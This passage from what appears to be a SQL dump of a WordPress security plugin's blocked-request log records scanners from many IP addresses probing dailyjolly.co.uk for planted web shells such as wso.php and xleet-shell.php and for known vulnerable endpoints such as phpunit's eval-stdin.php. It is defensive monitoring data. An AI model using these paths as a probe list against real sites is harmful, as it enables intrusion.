hp',0,707,0),('159.203.93.66',2680905026,'',0,1673733497.0305,55,'eTivfUKoB4E8bSuCAZOFsg6z','','19|0|0|0|dailyjolly.co.uk/logs.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.1787,55,'1XCKINzot7jPFDORG2QV94rp','','19|0|0|0|dailyjolly.co.uk/local.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.1975,55,'rcvDixINTgmQt6j873LZJGsV','','19|0|0|0|dailyjolly.co.uk/ffAA531.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.2698,55,'bADaH3sRg9EnCcYiPuOy4J6F','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.3157,55,'wqSBTeap2IKV6GMQkxEshm7D','','19|0|0|0|dailyjolly.co.uk/wp-2019.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.3223,55,'wv3gcnkSHmW4V5G2rBTFOAYz','','19|0|0|0|dailyjolly.co.uk/alwso.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.3813,55,'2e3SFWXyoU50YcjrRdhquDf7','','19|0|0|0|dailyjolly.co.uk/wp-fox.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7021,55,'qNTh2b8SLoR4fPpGDYm6jJs1','','19|0|0|0|dailyjolly.co.uk/511.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7073,55,'Qk0HuN6sWqA5GUefompOZ1Y9','','19|0|0|0|dailyjolly.co.uk/lol.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7153,55,'bzSMvcyLB1G6QJ7D0F5Timqk','','19|0|0|0|dailyjolly.co.uk/panel.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7189,55,'kP9tc5oaiYDqSdQv1VTuh3FU','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7538,55,'Q0Mmr6JekDVF82nCcuLNhgTd','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.7611,55,'kChZo9YrTunKwXS1p4fMNPL8','','19|0|0|0|dailyjolly.co.uk/oldindex.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733497.8069,55,'WLTbDQ2Xd5nYMoPiUIBuc6Kj','','19|0|0|0|dailyjolly.co.uk/wp-log.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733498.0532,55,'fnmGNcdJSDB6lyP9Xtk5i4g2','','19|0|0|0|dailyjolly.co.uk/Anon.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733498.0533,55,'x7olWsBN8IGJSTChMEvAP92Z','','19|0|0|0|dailyjolly.co.uk/.wp-themes.php',0,19,0),('159.203.93.66',2680905026,'',0,1673733498.0542,55,'qudBTi8CN9SIWsmO3YrGPcng','','19|0|0|0|dailyjolly.co.uk/.wp-back.phP',0,19,0),('147.78.47.249',2471374841,'',0,1673775038.0755,55,'56VX04zP7FoD9ZSMrANsLvhm','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('109.248.175.208',1845014480,'',0,1673776647.5707,55,'SLCjHzo75di4aRPXrEYtvI1T','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/westand/include/lang_upload.php',0,19,0),('143.198.193.188',2412167612,'',0,1673777891.4581,55,'jtsYrhbkwcouzNAevH9OIJn4','','19|0|0|0|dailyjolly.co.uk/installer.php',0,19,0),('37.76.27.211',625744851,'',0,1673787446.5665,55,'EwkVOsF8lS6JbogYMzteiCaU','','19|0|0|0|www.dailyjolly.co.uk/adminer.php',0,19,0),('41.251.178.115',704361075,'',0,1673801877.3456,55,'G0KZeiJS7t48Yn2aOlqpf6wB','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('41.251.178.115',704361075,'',0,1673804804.4300,55,'rIHsk9b7KCxi3cNuhJzOAE1P','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('194.32.120.168',3256907944,'',0,1673811021.3492,55,'4ZGKnoNWYjU1P3hfwBd6eiTX','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('45.248.151.22',771266326,'',0,1673813766.2454,55,'BJHuLoYnrGNbljTzFXxdc3ye','','19|0|0|0|www.dailyjolly.co.uk/rxonxxhu.php',0,19,0),('20.51.247.40',338949928,'',0,1673824210.7035,55,'iz7upDqwNRsP5V6EZAcUgQv8','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('208.109.33.169',3496812969,'',0,1673835819.1530,55,'IhA3BcZjOTyVw167M2kLrJsm','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('4.233.59.82',82393938,'',0,1673840360.4370,55,'BbSAPlIuYMzWqt0LCoHFiD72','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840373.7438,55,'OTxRg8yvmk5qdG4bFaANXeor','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840386.6314,55,'2jdirEUz5MPlWZB1ACbafTHO','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840402.9545,55,'nRlKZ8yoVD3pjIOTBUXbhFtQ','','19|0|0|0|www.dailyjolly.co.uk/wp-admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673840422.8310,55,'2LIup0B5qvNT7mjxndPMQyFw','','19|0|0|0|www.dailyjolly.co.uk/content.php',0,19,0),('4.233.59.82',82393938,'',0,1673840422.8661,10,'2LIup0B5qvNT7mjxndPMQyFw','','707|0|0|0|www.dailyjolly.co.uk/content.php',0,707,0),('4.233.59.82',82393938,'',0,1673840439.7920,55,'4DVQaltr3FTZMNg9UubwzKeY','','19|0|0|0|www.dailyjolly.co.uk/old-index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840448.2894,55,'k6BLA3Tyrqh4sdWXuignONac','','19|0|0|0|www.dailyjolly.co.uk/new-index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840458.7827,55,'ALr8oNXlvaSbHJgs7FuCDwBE','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673840469.6494,55,'ZixoeT0dpc81ybuamBVMwjQv','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/xm.php',0,19,0),('4.233.59.82',82393938,'',0,1673840477.1739,55,'YCPMuZdvmblEjof6expNqwzQ','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('4.233.59.82',82393938,'',0,1673840485.2036,55,'4D5NREWpZuKtqOmXHrUAvL1o','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('4.233.59.82',82393938,'',0,1673840498.0598,55,'62hAfbPuvIOwG5VFnUx0BYdg','','19|0|0|0|www.dailyjolly.co.uk/media-admin.php',0,19,0),('4.233.59.82',82393938,'',0,1673840507.9789,55,'43wHXOMSv8nDRhxjiTmduIYa','','19|0|0|0|www.dailyjolly.co.uk/mt/pekok.php',0,19,0),('4.233.59.82',82393938,'',0,1673840540.1099,55,'5VkWmx90MRE4jPFI3yteGQvX','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('4.233.59.82',82393938,'',0,1673840550.8144,55,'pPe5ywlGaJ1hEDdgZtqi0LcX','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('4.233.59.82',82393938,'',0,1673840558.3360,55,'LaOGCP6AgsoiRdJm4WIxt2Qh','','19|0|0|0|www.dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('4.233.59.82',82393938,'',0,1673840567.0625,55,'4SUstKjTyQYCr0E5uVkxMq1L','','19|0|0|0|www.dailyjolly.co.uk/fox.php',0,19,0),('4.233.59.82',82393938,'',0,1673840579.3439,55,'iG71Jh80fIctZbj42QY5OR6o','','19|0|0|0|www.dailyjolly.co.uk/fox.php',0,19,0),('4.233.59.82',82393938,'',0,1673840590.5334,55,'QZPOyWHxa6qYAibc4d8gCeXz','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('4.233.59.82',82393938,'',0,1673840599.3575,55,'L6whH2jAxWBld8uO3rvPC0kt','','19|0|0|0|www.dailyjolly.co.uk/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673840629.4391,55,'hoDa74OAjecnyHIg2ZNGkTvP','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('4.233.59.82',82393938,'',0,1673840637.7483,55,'x8tQgCozK0DbS3Yl6hawTknN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/wp-atom.php',0,19,0),('4.233.59.82',82393938,'',0,1673840649.8148,55,'jCzFYreukbdSGtXxpqAcK173','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('4.233.59.82',82393938,'',0,1673840657.8539,55,'tiGk2fY6orgZVIh7l8xLnvJR','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('4.233.59.82',82393938,'',0,1673840671.5056,55,'IopLfERvc6WDGz9gSkbeJN41','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/wp.php',0,19,0),('4.233.59.82',82393938,'',0,1673840681.5659,55,'p37jfceLCiOd0AJbqxNn8YQy','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('4.233.59.82',82393938,'',0,1673840689.4557,55,'9kIzQhbLp1HFRtyEvWYPfx4J','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('4.233.59.82',82393938,'',0,1673840700.3465,55,'VoM0A3IndsTxuqm1aHtlr6y7','','19|0|0|0|www.dailyjolly.co.uk/alwso.php',0,19,0),('4.233.59.82',82393938,'',0,1673840710.3569,55,'ZEzQrTlvCsB6SW5HFncyeMLh','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('4.233.59.82',82393938,'',0,1673840750.9137,55,'zK9JTSPE7rFGCYUQ4bvmZfiO','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php',0,19,0),('4.233.59.82',82393938,'',0,1673840858.1369,55,'ZNgQcxtSToGn5a9VqHfhBP7u','','19|0|0|0|www.dailyjolly.co.uk/shell20220621.php',0,19,0),('4.233.59.82',82393938,'',0,1673840865.8885,55,'xGBtsMUIKaFChEJwgHYDA7k9','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('4.233.59.82',82393938,'',0,1673840921.8677,55,'ItBfQROhYcrMCdmwAsN1EKPa','','19|0|0|0|www.dailyjolly.co.uk/xleet-shell.php',0,19,0),('4.233.59.82',82393938,'',0,1673840934.6024,55,'qbitO27h1dxln3VHAjMJXyaY','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('4.233.59.82',82393938,'',0,1673840943.9515,55,'sUh3LdTgFK62SopjMaA0QtWE','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('4.233.59.82',82393938,'',0,1673840952.1022,55,'ELBcZSDXlftYhbTgyw8OqpQm','','19|0|0|0|www.dailyjolly.co.uk/wp-content/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673840968.1125,55,'21lnUsCZpBz5JWXYjDFgV8a0','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673840978.7049,55,'DlesEgQ1CkryzMO2ufmRw4h3','','19|0|0|0|www.dailyjolly.co.uk/autoload_classmap.php',0,19,0),('4.233.59.82',82393938,'',0,1673840996.7163,55,'9Ck6tG8cNTDRBE3AVXubgPUW','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('4.233.59.82',82393938,'',0,1673841038.0731,55,'yQ7eXsgaPGJ1Whi6vxMOnEpZ','','19|0|0|0|www.dailyjolly.co.uk/s.php',0,19,0),('4.233.59.82',82393938,'',0,1673841061.8013,55,'gtU74e0r8jkIYHTAfivlBb6X','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('4.233.59.82',82393938,'',0,1673841079.2043,55,'97R1OXA5gF84WknNo6zyqpTj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/autoload_classmap.php',0,19,0),('4.233.59.82',82393938,'',0,1673841096.8756,55,'i8bCaoBZe7FDsdQ0RYhg6urV','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('4.233.59.82',82393938,'',0,1673841146.3092,55,'f5VsI6vD7Tq3kjx9RzP0chZe','','19|0|0|0|www.dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('4.233.59.82',82393938,'',0,1673841158.9472,55,'Kegu6ABoFDWTXmdnP0jIEZbH','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('4.233.59.82',82393938,'',0,1673841173.4014,55,'PmHwq0zXDhGt27cajUi9dQyF','','19|0|0|0|www.dailyjolly.co.uk/b.php',0,19,0),('4.233.59.82',82393938,'',0,1673841183.8189,55,'9EknCyKUfu2VZNX8jzqvrL5w','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('4.233.59.82',82393938,'',0,1673841198.9471,55,'fR2loGUwPq4vkb1OdAB896SD','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('4.233.59.82',82393938,'',0,1673841219.4822,55,'PCtuVDTrz3QIglOYKLFkmxhU','','19|0|0|0|www.dailyjolly.co.uk/sym403.php',0,19,0),('4.233.59.82',82393938,'',0,1673841263.4666,55,'jXAv15McSHZD7IJP0dzC92lt','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('4.233.59.82',82393938,'',0,1673841303.5229,55,'TO6NjLW32FQ58Dk1udPvSGiV','','19|0|0|0|www.dailyjolly.co.uk/xmlrpcs.php',0,19,0),('4.233.59.82',82393938,'',0,1673841317.7863,55,'D14uCImdZbOiXBypAwLo7qFk','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('4.233.59.82',82393938,'',0,1673841330.2731,100,'rGnH7ER8uNbko0mUPIvKgd1B','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('4.233.59.82',82393938,'',0,1673841346.5994,55,'ewp45giVYtIFu9mZMfLjAc3T','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('4.233.59.82',82393938,'',0,1673841441.5580,55,'abv3noZOgG1W8BT2Qw4qyFPx','','19|0|0|0|www.dailyjolly.co.uk/o.php',0,19,0),('4.233.59.82',82393938,'',0,1673841450.1603,55,'Kome6hVvMaA195zrUjQ4ycfx','','19|0|0|0|www.dailyjolly.co.uk/indeeex.php',0,19,0),('4.233.59.82',82393938,'',0,1673841458.9729,55,'U04wxkPmYtuSFXbvArfKRONi','','19|0|0|0|www.dailyjolly.co.uk/ne.php',0,19,0),('4.233.59.82',82393938,'',0,1673841467.7310,100,'dH8Rw6fCbiu4SGTPo0JVn1Et','','13|0|0|0|www.dailyjolly.co.uk/ff.php',0,13,0),('4.233.59.82',82393938,'',0,1673841476.9391,55,'UovIJRze46wbnKkGxmhfy2Z7','','19|0|0|0|www.dailyjolly.co.uk/8.php',0,19,0),('4.233.59.82',82393938,'',0,1673841487.2338,55,'j83cQY1wZ6CFnyoa0emiqKTX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('4.233.59.82',82393938,'',0,1673841500.2075,55,'SOvYh4dUIj0372glswJWCnaV','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('4.233.59.82',82393938,'',0,1673841535.5626,55,'zTgakneQrSBdv3CujiwVlYtM','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('4.233.59.82',82393938,'',0,1673841575.3940,55,'rRi8lJ2vNdUsTe19PpwakLhK','','19|0|0|0|www.dailyjolly.co.uk/1975.php',0,19,0),('4.233.59.82',82393938,'',0,1673841587.5813,55,'sKDRnSwdJOU2TiQke1Wgclj3','','19|0|0|0|www.dailyjolly.co.uk/small.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842696.9311,55,'Eti2zvbyWYqklDHAXCjfnmG3','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842708.4939,55,'hvpeC2H1DqQG9zxMNJY87LFi','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842709.6143,55,'wpKch6eYRHzm8daNTClyLtJV','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842711.1074,55,'EVxcjtTUIO75o0C4rn2S1adb','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842713.4088,55,'FN97jIwvK6hCEUcAbQMyXVet','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842713.5052,10,'FN97jIwvK6hCEUcAbQMyXVet','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('208.109.33.169',3496812969,'',0,1673842714.7974,100,'niH7f4OcU8wzlVWuQtNB2qk1','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('208.109.33.169',3496812969,'',0,1673842717.5166,55,'AC8lSHXumUGaDPnykZijpowL','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842719.0967,55,'vJ2jNCTIoFG9ZxpQlBiqfYLr','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842721.8039,55,'chTKSB3tQ0l7U9IWAm5fvHFY','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842724.4633,55,'Y91NpwFWDOla8AyzMS4rHjux','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842725.8743,55,'bkhJGg7iz6WASH5RNos1CTUu','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842730.3920,55,'UO7mFRJfPQX1ixkNheo3wnY0','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842731.6011,55,'8AJxZSdsQ0V2ButljMI1GgLY','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842733.2475,55,'bEF4ti3wpekC7ryfPUVZQ8MT','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842734.7985,55,'HIPxAZ9pvE2mlsbQuSaCKk3t','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842736.0400,55,'aM6AcQil8OD2b7dXJEx1ouPh','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842737.1496,55,'Tuavor4beCzQM1Rp7Ug29syn','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842738.3427,55,'ykovnb6YaBQuEgiMDsSwtLA1','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842740.0422,55,'4sFgf7QITr5ijud8HR0Vq6bN','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842741.2471,55,'BeCuIGHoYZJDPSgxlMpdwmU4','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842743.8920,55,'Zv8Pfd2whYDGSy9K3ENlt0be','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('208.109.33.169',3496812969,'',0,1673842745.4363,55,'eC1bsuH8RkjWMLJE9ly7xqFw','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843340.6055,55,'dnRu0Dg48iJmCTB6EXVZl1Ns','','19|0|0|0|www.dailyjolly.co.uk/shell4.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843341.9042,55,'RFyPpt0YDanIQ9odxKjbO4UB','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843658.3412,55,'63DrOJheFksjPN5b8Zxvn2B4','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843660.3946,55,'t71YX4g6Sr5lyTBnaN3PivmU','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843662.3908,55,'CyDNcxR14WTdOMwr2Vf5i39B','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843662.4230,10,'CyDNcxR14WTdOMwr2Vf5i39B','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('154.246.0.207',2599813327,'',0,1673843685.0016,55,'B6Qogy1KUfuXHq9j5dbRrLIe','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843687.3182,55,'vrQ4HWgIf7uFUk9A8l1X2sMS','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('154.246.0.207',2599813327,'',0,1673843738.9060,55,'ny6uh7mrWgXqo8zEIP3v5OjY','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1673851615.0726,55,'rgOSmaHws1q2h5pAnZPoMeYu','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858072.3675,55,'JZQrR2DBVi0MuWKklzOIdECa','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/modules.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858073.4828,55,'LpfR8h3AGn9kyJarwjt2qTNI','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858074.6097,55,'sbhdTM6pmIZE2gAt8K1R5D9c','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/upspy/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858075.6811,55,'PXGy8FR4J1oftK07nTkOHIm3','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ubh/index.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858076.8112,55,'RwX0Ie1EctugUWLhNxqJFzGa','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858076.8525,10,'RwX0Ie1EctugUWLhNxqJFzGa','','707|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php',0,707,0),('208.109.33.169',3496812969,'',0,1673858077.9203,100,'mSqEHunQ0D1zN2OPVkysT5eL','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/xichang/x.php',0,13,0),('208.109.33.169',3496812969,'',0,1673858081.1232,55,'1PVtMfUG3ySeI8LqhTbR4vl9','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/shapes.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858082.4438,55,'TJLpqrsVP63jA7HBNEhcn5MW','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858083.5253,55,'5wWDzRJp6N4bqxt9lQerjXEB','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858085.8196,55,'KbecRLm9Z5H12gqQapvMDAXO','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858086.9149,55,'wHtxfmyG8pzLqVSuNC5eDTPo','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858090.0098,55,'DE67n4f5ViCjtz8e20IWdOAs','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858091.1030,55,'ftCBrbzex9joP8dnlqIY2OMK','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/network/wp-footer.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858092.6307,55,'lhwYd9y5aiGmnzg2MLQSj7bB','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858093.7318,55,'B3Qg48Uf0jO5ClT1DZGHxSua','','19|0|0|0|www.dailyjolly.co.uk/wp-content/vuln.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858094.8083,55,'AFIi7kmsDUtY3SzCJfxB4X09','','19|0|0|0|www.dailyjolly.co.uk/upel.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858096.4872,55,'61mhpDZuU0q7g4LkXOfzilnN','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858097.5786,55,'LbTcPn8z90DmMHjrJgiYux5K','','19|0|0|0|www.dailyjolly.co.uk/098.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858098.6598,55,'mEpiA3o8ux16Cwz5bIrjDkZR','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858099.7323,55,'07lOTP2ZrLYezsDAfK1tCaRb','','19|0|0|0|www.dailyjolly.co.uk/new_license.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858100.9157,55,'jbiV1q9Cx56hBY4mrX3wa0NM','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php',0,19,0),('208.109.33.169',3496812969,'',0,1673858102.0394,55,'UrpRmLe9IKwCqktvxiTlfoQJ','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863121.4117,55,'vxaKiUjO25SLlqIub3hWg9rZ','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863126.9813,55,'bUV63W04uDnQN8gjrO12Bk7l','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863131.1853,55,'uVSewinm48TyghXQjZp2FEAr','','19|0|0|0|www.dailyjolly.co.uk/wikindex.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863137.1730,55,'gFZQOWTeYNctxaVSUwK3zljP','','19|0|0|0|www.dailyjolly.co.uk/wp-content/mu-plugins-old/index.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863252.3136,55,'di4Omrx1flVGAQ2L5uNgheRj','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863252.3495,10,'di4Omrx1flVGAQ2L5uNgheRj','','707|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,707,0),('91.191.209.106',1539297642,'',0,1673863270.5484,55,'gmf4n3txayAj6T9RIpcuPD8l','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('116.0.20.53',1946162229,'',0,1673863289.0117,55,'tpHE80f5BP3gizbky69schZX','','19|0|0|0|dailyjolly.co.uk/wp-cc.php',0,19,0),('116.0.20.53',1946162229,'',0,1673863289.0650,55,'OvIfxoECJUHTYLtPDpsn93uh','','19|0|0|0|dailyjolly.co.uk/wp-commentin.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863309.8311,55,'U8f5WPCA04OH9vpTGoqQIMy3','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863310.1319,55,'Qpm129hX0rM73HkuSd8Elact','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863318.7175,55,'L5qRj2lTiXkazHbU64Ct7Wvs','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863323.5866,55,'gHmCVFd24fJcGNQbh8YK6l7T','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863323.8143,55,'CvkBTGX0pMVZNPlO46tes71z','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863334.1060,55,'tmjQ4ngKDoCMubkV8E3UhHqy','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863349.4959,55,'dMLuJY346sPTvZ1XKAlWEzQr','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('91.191.209.106',1539297642,'',0,1673863435.9584,100,'0M9moy2SHjsz7dYa1gL6ieCE','','13|0|0|0|www.dai